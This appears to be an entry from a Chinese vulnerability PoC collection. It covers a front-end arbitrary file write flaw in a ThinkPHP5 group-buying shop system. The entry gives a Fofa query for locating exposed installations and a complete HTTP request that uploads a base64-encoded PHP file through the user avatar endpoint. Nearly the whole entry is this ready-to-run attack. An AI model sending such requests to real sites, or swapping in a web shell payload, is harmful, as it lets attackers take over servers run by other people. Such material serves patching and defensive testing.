# 拼团零售商城系统前台任意文件写入漏洞

**ThinkPHP5 拼团拼购系统，支持热门商品，余额总览，红包分销，商品销售，购物车等功能，后台使用管理系统所构建；该漏洞利用需要普通用户登录权限**

## Fofa

```yaml
"/public/static/plugins/zepto/dist/zepto.js"
```

## poc

```yaml
POST /home/user/avatar HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=kplfq401bdcmql31vr7jp2s6ul; user_id=1; uname=%25E5%2588%2598%25E6%2580%25BB
Host: 127.0.0.1
Origin: http://127.0.0.1
Referer: http://127.0.0.1/home
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1

base64=data:image/php;base64,PD9waHAgcGhwaW5mbygpOw==
```

![image-20240720125113160](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407201251370.png)

## 漏洞来源

- https://mp.weixin.qq.com/s/ZjuanRwJzZvgJhJARdq1jg